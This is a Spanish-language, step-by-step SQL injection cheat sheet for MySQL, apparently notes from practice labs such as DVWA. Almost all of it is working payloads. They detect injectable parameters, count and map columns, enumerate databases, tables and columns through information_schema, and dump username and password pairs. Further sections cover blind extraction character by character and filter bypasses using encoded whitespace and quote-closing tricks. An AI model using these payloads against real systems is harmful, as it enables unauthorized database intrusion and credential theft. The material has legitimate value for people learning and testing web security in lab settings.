=====================================================
      SQL INJECTION - PASO A PASO (MySQL)
=====================================================

=== PASO 1: DETECTAR VULNERABILIDAD ===

Probar:
'
' -- -
' OR '1'='1' -- -
1' AND '1'='1' -- -
1' AND '1'='2' -- -   (comparar respuestas)


=== PASO 2: CONTAR COLUMNAS ===

' ORDER BY 1 -- -
' ORDER BY 2 -- -
' ORDER BY 3 -- -     (subir hasta error)

O con UNION:
' UNION SELECT NULL -- -
' UNION SELECT NULL,NULL -- -
' UNION SELECT NULL,NULL,NULL -- -


=== PASO 3: IDENTIFICAR COLUMNAS VISIBLES ===

' UNION SELECT 1,2,3 -- -
(ver que numeros aparecen en pantalla)


=== PASO 4: INFO BASICA ===

' UNION SELECT 1,database(),user() -- -
' UNION SELECT 1,version(),@@hostname -- -


=== PASO 5: LISTAR BASES DE DATOS ===

' UNION SELECT 1,schema_name,3 FROM information_schema.schemata -- -

O una por una:
' UNION SELECT 1,(SELECT schema_name FROM information_schema.schemata LIMIT 0,1),3 -- -
' UNION SELECT 1,(SELECT schema_name FROM information_schema.schemata LIMIT 1,1),3 -- -
' UNION SELECT 1,(SELECT schema_name FROM information_schema.schemata LIMIT 2,1),3 -- -


=== PASO 6: LISTAR TABLAS DE UNA BD ===

' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema='nombre_bd' -- -

O con database() actual:
' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database() -- -

Todas juntas:
' UNION SELECT 1,GROUP_CONCAT(table_name),3 FROM information_schema.tables WHERE table_schema=database() -- -


=== PASO 7: LISTAR COLUMNAS DE UNA TABLA ===

' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users' -- -

Todas juntas:
' UNION SELECT 1,GROUP_CONCAT(column_name),3 FROM information_schema.columns WHERE table_name='users' -- -


=== PASO 8: EXTRAER DATOS ===

' UNION SELECT 1,username,password FROM users -- -

Concatenar varios campos:
' UNION SELECT 1,CONCAT(username,':',password),3 FROM users -- -

Todos los registros en una linea:
' UNION SELECT 1,GROUP_CONCAT(username,':',password SEPARATOR '<br>'),3 FROM users -- -


=====================================================
            BLIND - PASO A PASO
=====================================================

=== PASO 1: CONFIRMAR BLIND ===

1' AND 1=1 -- -    (respuesta normal)
1' AND 1=2 -- -    (respuesta diferente)


=== PASO 2: LONGITUD DE DATABASE() ===

1' AND length(database())=1 -- -
1' AND length(database())=2 -- -
...hasta TRUE


=== PASO 3: EXTRAER DATABASE() CARACTER A CARACTER ===

1' AND substring(database(),1,1)='a' -- -
1' AND substring(database(),1,1)='b' -- -
...hasta TRUE, luego posicion 2, 3, etc.


=== PASO 4: CONTAR BASES DE DATOS ===

1' AND (SELECT count(schema_name) FROM information_schema.schemata)=1 -- -
1' AND (SELECT count(schema_name) FROM information_schema.schemata)=5 -- -


=== PASO 5: LONGITUD NOMBRE BD (posicion X) ===

1' AND (SELECT length(schema_name) FROM information_schema.schemata LIMIT 0,1)=18 -- -
1' AND (SELECT length(schema_name) FROM information_schema.schemata LIMIT 1,1)=4 -- -


=== PASO 6: EXTRAER NOMBRE BD CARACTER A CARACTER ===

1' AND substring((SELECT schema_name FROM information_schema.schemata LIMIT 2,1),1,1)='d' -- -
1' AND substring((SELECT schema_name FROM information_schema.schemata LIMIT 2,1),2,1)='v' -- -


=== PASO 7: REPETIR PARA TABLAS ===

Contar tablas:
1' AND (SELECT count(table_name) FROM information_schema.tables WHERE table_schema='dvwa')=2 -- -

Longitud nombre tabla:
1' AND (SELECT length(table_name) FROM information_schema.tables WHERE table_schema='dvwa' LIMIT 0,1)=5 -- -

Extraer nombre:
1' AND substring((SELECT table_name FROM information_schema.tables WHERE table_schema='dvwa' LIMIT 0,1),1,1)='u' -- -


=== PASO 8: REPETIR PARA COLUMNAS Y DATOS ===

(mismo proceso con information_schema.columns y luego la tabla objetivo)


=====================================================
            BYPASS - ESPACIOS FILTRADOS
=====================================================

Sustituir espacios por:

%09  = Tab
%0a  = Newline (salto de linea)
%0b  = Tab vertical
%0c  = Form feed
/**/  = Comentario vacio
+    = Espacio (a veces)

Ejemplo con %09:
?name=root'%09OR%09'1'='1
?name=x'%09UNION%09SELECT%091,2,3,4,'5


=====================================================
         BYPASS - SIN COMENTARIOS (-- -)
=====================================================

Cuando no puedes usar -- - o # para comentar el resto.

TRUCO: La comilla final de la consulta original cierra tu payload.

Consulta original:
SELECT * FROM users WHERE name='INPUT'

PAYLOAD (ultimo valor con comilla antes, no despues):
?name=x'%09UNION%09SELECT%091,2,3,4,'5

Resultado:
SELECT * FROM users WHERE name='x' UNION SELECT 1,2,3,4,'5'
                                                         ^ esta la pone la consulta original

FLUJO COMPLETO SIN COMENTARIOS:

1. Detectar:
?name=root'%09OR%09'1'='1

2. Contar columnas (probar hasta que funcione):
?name=x'%09UNION%09SELECT%09'1
?name=x'%09UNION%09SELECT%091,'2
?name=x'%09UNION%09SELECT%091,2,'3
?name=x'%09UNION%09SELECT%091,2,3,'4
?name=x'%09UNION%09SELECT%091,2,3,4,'5

3. Info basica:
?name=x'%09UNION%09SELECT%091,database(),user(),4,'5

4. Listar BDs:
?name=x'%09UNION%09SELECT%091,schema_name,3,4,'5'%09FROM%09information_schema.schemata%09WHERE%09'1'='1

5. Listar tablas (la comilla de 'exercises la cierra la consulta):
?name=x'%09UNION%09SELECT%091,table_name,3,4,'5'%09FROM%09information_schema.tables%09WHERE%09table_schema='exercises

6. Listar columnas:
?name=x'%09UNION%09SELECT%091,column_name,3,4,'5'%09FROM%09information_schema.columns%09WHERE%09table_name='users

7. Extraer datos:
?name=x'%09UNION%09SELECT%091,name,passwd,4,'5'%09FROM%09users%09WHERE%09'1'='1


=====================================================